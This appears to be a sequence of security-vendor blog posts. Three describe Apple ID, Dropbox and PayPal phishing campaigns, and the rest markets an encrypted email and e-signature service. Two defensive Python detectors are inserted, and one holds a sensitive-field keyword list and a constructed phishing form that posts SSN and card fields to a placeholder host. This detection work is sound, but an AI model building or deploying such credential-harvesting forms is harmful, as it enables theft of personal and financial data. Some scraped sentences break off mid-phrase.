Many phishing campaigns come and go in our line of work, but one type of campaign that we can always count on seeing is the kind involving the tech giant Apple.

This week, we’ve seen an uptick in phishing emails aimed at Apple ID users. Some of the variants spotted inform the recipient that their Apple ID has been locked or limited for security purposes and that they must log in to Apple’s website with their credentials to lift the restriction. A link is provided within the email for the user.


During my investigation, I accessed the provided link within a secure environment and was presented with the screen as seen in the screenshot above. You can tell that a lot of effort went into providing the user with a somewhat legitimate-looking webpage reminiscent of Apple’s own website; however, a few things stand out. For one, none of the buttons or links were clickable on the page. They were only static images to fool the user. Also not shown in the screenshot is the background image of the website, likely due to a static pixel size. On a high-resolution monitor, it can cause the image to repeat itself.


After entering in fake credentials, I proceeded to the next phase of this scam which led me to a page asking for additional personal information like date of birth, billing address etc. (I got a bit creative on this step). Again, extreme detail went into replicating the webpage to Apple’s aesthetic standards and would prove very difficult for many to identify visually as a fake. After clicking the “Verify” button, I was then directed to a page requesting credit card information. Interestingly enough, the form only allowed for either Visa or MasterCard inputs. I clearly wasn’t going to put my own credit card information into the fields, so when the form validation within the website code didn’t accept a fake entry, the investigation stopped there. I imagine that past this screen the user would be directed to Apple’s main website or be presented with a 404 error page.


As time goes on, the spammers will evolve their tactics and approaches to this campaign. AppRiver will continue to monitor live samples of this phishing campaign and continue blocking new variants as they are released into the wild. As always, AppRiver’s SecureTide spam and malware protection protects our customers from dangerous emails like these and many others like them.

Over the past few months our team has seen a rise of Dropbox-related phishing emails directed at customers under the guise of receiving an important document sent by a colleague or other entity. The emails seem to have a common pattern of informing the recipient that they must click on the link provided within the email in order to retrieve the document. Besides the ‘without frills’ visuals and language of the email, other clues that expose the phishing scam are the provided links. Hovering over the hyperlink will reveal that the website the email is attempting to direct users to is not

I’ve seen several variants of this campaign and they all have common elements, but many things such as the URL, Subject, From address and text all vary. To further investigate how this campaign works, I tried visiting some of the links within the email and AppRiver’s SecureSurf web protection engine proactively blocked 3 of the links I attempted to launch (this is great news for admins who might be concerned about users being tricked into launching these links and falling victim to this scam). One of the newer emails had a link that I was able to visit without issue. The link directs the user to a website that attempts to impersonate Dropbox and instructs the user to log in using their email credentials in order to access the document as seen below.




I typed in a fake email address and password and clicked on the button provided. From there the website brought me to a secondary page where it requested that I either provide a recovery phone number or email address to proceed further. No doubt this is to trick the user into providing their account recovery options so the scammers can then reset their email password without issue and thus have full access to the user’s mailbox. Once again I provided fake information and proceeded to the next page. Once this happened, I was redirected to’s website where I got to see some amazing but not so cheap apartments in Miami for rent.


As with all emails, if something seems off or weird in nature, proceed with caution. If you are an IT Administrator, security awareness is one of the best defenses against phishing emails like these. Combine that with the robust email and web protection services that AppRiver has to offer and you’ll have a good defense-in-depth strategy for your organization.
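The hover check described above for the Dropbox-themed emails can be automated at the mail gateway. The following is an added example, not code from the original post or from AppRiver's products; the `BRAND_DOMAINS` allow-list, the function names and the sample body are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: hypothetical allow-list of domains that legitimately serve each brand.
BRAND_DOMAINS = {"dropbox": ("dropbox.com",)}

class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def host_of(url):
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:  # malformed URL
        return ""
def in_domain(host, domain):
    return host == domain or host.endswith("." + domain)

def mismatched_links(html_body):
    """Return (href, text, reason) for links whose target disagrees with what is shown."""
    parser = AnchorCollector()
    parser.feed(html_body)
    findings = []
    for href, text in parser.links:
        target, shown = host_of(href), host_of(text)
        brands = [b for b, doms in BRAND_DOMAINS.items() if b in text.lower()
                  and not any(in_domain(target, d) for d in doms)]
        if shown and shown != target:  # strict host comparison
            findings.append((href, text, "displayed URL differs from target"))
        elif brands:
            findings.append((href, text, "names %s but points elsewhere" % brands[0]))
    return findings

# Constructed sample body (not taken from a real message).
SAMPLE = """<a href="http://files.example.net/dropbox/view">View on Dropbox</a>
<a href="https://www.dropbox.com/help">Dropbox help</a>
<a href="http://dropbox.com.example.org/login">https://www.dropbox.com/doc</a>"""
```

The suffix match in `in_domain` is what rejects look-alike hosts such as `dropbox.com.example.org`, which a plain substring test would accept.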

Over the past few years, we have seen explosive growth in malware and targeted spear phishing attacks being distributed via email. While those threats have necessarily garnered a lot of attention, it’s important to stay aware that other more historically common attacks are also quite persistent and still pose a significant threat to consumers and businesses.


One phishing attack that we have been monitoring this week utilizes a cast-net style (one size fits all) approach in its effort to steal sensitive personal and financial data, all under the guise of a PayPal security message. These phishing messages rely on the ever popular fake security notice approach in an attempt to trick users into disclosing their personal information such as name, address, mother’s maiden name, social security number and credit card info. The attackers’ method for extracting this information from the recipient is through the inclusion of an HTML attachment posing as an official account verification page belonging to PayPal. Because an HTML attachment, when clicked, opens in your browser, the victim may even believe they are on the actual PayPal website.

Here’s a look at the message and the attached phishing page:



Though most users are not accustomed to receiving HTML attachments, many may not realize how unusual it would be for a real company like PayPal to actually request a security verification in this manner. In fact, any real business (like PayPal) would almost certainly simply request that you navigate to PayPal on your own and verify things after logging in normally. If you ever find yourself on the receiving end of an email similar to this, especially if it is asking you to provide any personal information, ALWAYS go directly to the site by typing it in your browser directly and not by following links or attachments within the email itself. As always, our customers are protected from these messages.
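A mail filter can look for the pattern described above: an HTML attachment whose form collects sensitive fields and submits them to a remote host. This is an added example, not code from the original post or from AppRiver's filtering; the `SENSITIVE` keyword list, the function names, the file name and the `collector.example.net` host are assumptions, and the message is constructed.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: substrings of field names that suggest the data the lure asks for.
SENSITIVE = ("pass", "ssn", "social", "maiden", "card", "cvv")

class FormScanner(HTMLParser):
    """Record form targets and sensitive-looking input fields."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []
    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        if tag == "form":
            self.actions.append(attr.get("action") or "")
        elif tag in ("input", "select", "textarea"):
            name = (attr.get("name") or attr.get("id") or "").lower()
            if attr.get("type") == "password" or any(k in name for k in SENSITIVE):
                self.fields.append(name or "password")

def scan_html_attachments(raw_message):
    """Return one finding per HTML attachment whose form sends sensitive fields to a remote host."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".htm", ".html")):
            continue
        body = part.get_content()
        if isinstance(body, bytes):      # e.g. sent as application/octet-stream
            body = body.decode("utf-8", "replace")
        scanner = FormScanner()
        scanner.feed(body)
        hosts = [urlsplit(a).hostname for a in scanner.actions if urlsplit(a).hostname]
        if scanner.fields and hosts:
            findings.append({"file": name, "posts_to": hosts, "fields": scanner.fields})
    return findings

def build_sample():
    """Constructed message for the example; the host and file name are placeholders."""
    msg = EmailMessage()
    msg.set_content("Open the attached form to verify your account.")
    msg.add_attachment('<form action="http://collector.example.net/save.php" method="post">'
        '<input name="full_name"><input name="mother_maiden_name">'
        '<input name="ssn"><input name="card_number"><input type="submit"></form>',
        subtype="html", filename="Account_Verification.html")
    return msg.as_bytes()
```

Calling `scan_html_attachments(build_sample())` returns a single finding naming the attachment, the host the form posts to, and the sensitive fields it collects.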

Whether you’re a lender, title company, attorney, or realtor, if you’re in the real estate market, you know the scrimmage of getting all parties to sign the appropriate documents on time in a secure manner. Many markets, including the real estate market, have turned to electronic signature solutions to ensure that important documents are signed in a timely, secure manner.

The demand for e-signature solutions, coupled with the need for robust email encryption that protects nonpublic information (NPI), is one reason why AppRiver added a new electronic signature solution to its CipherPost Pro™ email encryption platform, which already includes secure messaging, file sharing, email tracking, and document e-signatures on a monthly subscription.


How e-Signatures and Encrypted Email Work

Many people mistakenly believe that since standard email does not physically change hands, it is more secure than standard mail. However, it is arguably less secure than a post card traveling from Tahiti to New York, with every postal worker (network servers) whose post office it passes through along the way having eyes on it. Heaven forbid it ends up in the wrong recipient’s mailbox (inbox).

Unlike standard email, encrypted email and secure e-signature solutions don’t pass from server to server or even inbox to inbox. Instead, they live on one server within the cloud. When users need to e-sign documents or read encrypted email, they are taken to the secure server to view and sign the document in question, rather than the documents or emails being brought to their inboxes. Since the email or document in question only exists on one server, the sender has the capability of recalling the message, should it inadvertently end up in the wrong inbox.

With secure e-signatures, signatories sign documents by clicking on the attachment in their email, typing their name into the e-signature certificate field, and clicking to acknowledge their signature.  All of this occurs right within their email client. In addition, CipherPost Pro automatically tracks documents and alerts the sender when documents are signed via desktop and mobile alert notifications.


Secure e-Signatures and Email Encryption: The Dynamic Duo

Unlike many stand-alone e-signature solutions that require users to log in to the secure platform in their browsers, this new secure e-signature offering is unique in that it integrates directly into Microsoft Outlook, Microsoft Office 365 and other Web-based email clients, meaning no additional steps must be taken to e-sign a document.

Additionally, it provides an alternative to costly and inefficient signing and transmission of paper documents with a simple “click-to-acknowledge” way to e-sign documents right in email.

CipherPost Pro’s new e-signature solution keeps documents encrypted and secure from the sender’s inbox to the signatory’s, even when stored. Whether a lawyer, realtor, or lender, from complex housing agreements needing multiple signatures to mortgage loan documents, all documents can be signed within seconds from a user’s inbox.

In addition to helping businesses remain compliant with Dodd-Frank, TILA-RESPA, HIPAA, and other regulations on how NPI is transmitted, AppRiver’s cloud-based e-signature solution helps customers improve productivity and lower costs, including costly courier, fax or email/print/scan scenarios. It gives users a convenient, fast way to e-sign and exchange various types and sizes of electronic documents and protects documents and sensitive or regulated data.

Additional Features at No Additional Cost

  • Maximum security.  Encrypt and protect documents in one click. Files are fully secured and signed documents are stored encrypted.
  • User authentication.  Every user is authenticated before e-signing and sending a document.
  • E-signature non-repudiation.  Full authentication, tracking and e-signing data is appended to the document.
  • Real-time activity alerts.  Users receive automatic notifications of e-signatures and message activity.
  • Selectable data residency.  Choose a data center location for documents and emails for regulatory compliance.
  • Support for large files and various file types.  Validate sizable documents such as complex PDFs as well as other file types, including x-rays, without size limitations.
  • Contributed to original sender.  Emails to signatories originate from the sender’s name, eliminating confusion about who owns and sent the information.
  • Mobile functionality.  Messages can be sent, signed and tracked through mobile apps for iOS, Android, Windows 10 and Blackberry 10.

The subscription price for a CipherPost Messaging Pro Account, which includes secure e-signatures, in addition to enterprise-level security, tracking, and control for sharing messages, large files, and information workflows, is $7.95 per month per user and free for guest users.

To find out more about AppRiver, CipherPost Pro and its other solutions visit

Lawyers instinctively understand that they have a responsibility to protect the confidentiality and privacy of their clients’ information. And for good reason. Our free whitepaper on email security in law firms explains what you need to know and how you can use secure email to win more clients.

Law firms are increasingly attractive targets for hackers because they can access a treasure trove of client data, intellectual property and pending deals.

In today’s environment, organizations in every industry must have a security program in place that meets relevant legal standards and accepted best practices.  But to be fair, one can almost understand why law firms have been slow to adopt legacy encryption solutions.  Historically, encryption has had a reputation for being difficult to use and deploy.

Thankfully, secure email services have evolved in many ways:

  • It’s more than just email encryption. AppRiver’s CipherPost Pro™ protects and impacts much more than email.  It encompasses secure mobile and tablet messaging, secure large file transfer, policy-based encryption, secure web form and automated delivery of secure e-statements.  It’s an integrated strategy for secure communication from any device and any location that replaces a disjointed set of ad-hoc tools that are riddled with security gaps.
  • Multi-layered security. AES-256 encryption is only the starting point. Organizations need greater control over messages and attachments, and most importantly, tools to remediate inevitable user error. CipherPost Pro can provide additional controls such as preventing messages from being forwarded or replied to, password protection of the message and attachments, message recall even after a message has been read, and content filtering to stop mistakes before they happen.
  • Productivity and security. CipherPost Pro can help bring tremendous value by accelerating processes. Real-time tracking enables staff and clients to know exactly when any action has been taken on a message and advance workflows. Being able to send an encrypted large file with a secure message reduces the need to use inefficient mail and courier services. You and your clients will be able to send secure messages from the office, at home using Gmail or, at the airport on an unsecure network or while on the move via a mobile or tablet. Workflows never have to slow down because of security, which means that you ultimately deliver faster for your clients.
  • Client communication. One of the most interesting ways that CipherPost Pro has evolved is that it has the potential to improve how you communicate with clients. Real-time tracking of messages activity gives clients unique transparency so they always know what’s happening in a workflow. You can give your clients large file transfer capability, so they can easily bypass frustrating corporate email size restrictions. You can also give clients access to the same email plugins, mobile apps, browser extensions and desktop clients that internal employees can use. Gone are the days when clients have to be driven to an external portal to read and reply to a message. They can have a secure message decrypted right into their customary inbox or mobile device, which makes CipherPost Pro as easy and familiar as traditional email.
  • eDiscovery and Archiving.  Legacy solutions have struggled to archive encrypted data and also typically force organizations to create separate mail stores. These limitations have left organizations woefully unprepared for eDiscovery and at risk for compliance fines due to improper record retention. CipherPost Pro can create a single mail store as well as automatically decrypt messages into any archiving solution so that organizations can properly retain and retrieve secure messages in the event of litigation or an audit.
  • In the cloud. Cloud-based solutions have become the de facto deployment model for email encryption because the large majority of organizations prefer a faster, easier deployment with no hardware infrastructure that interferes with their current network architecture. Cloud deployments also do not strain limited IT resources and are much easier to scale and upgrade in multiple global data jurisdictions. Organizations in heavily regulated industries such as healthcare and financial services are turning to cloud-based email encryption because of the value compared to on-premise solutions.

While email encryption will soon be required by all of your existing and potential new clients, keep in mind that not all email encryption is the same. There are vast differences in functionality and end user experience that impact clients.

Using a solution like CipherPost Pro that has a unique array of patented features enables firms to differentiate themselves as a potential legal partner.  What’s more, the ability to brand the solution for each firm and attorney creates unique business development opportunities as clients see with each message that you value their privacy.

It’s email encryption that’s easy, more secure, more flexible and more transparent for clients that ultimately accelerates the completion of projects.

To learn more, please visit our website.

Or start your free 30-day trial now.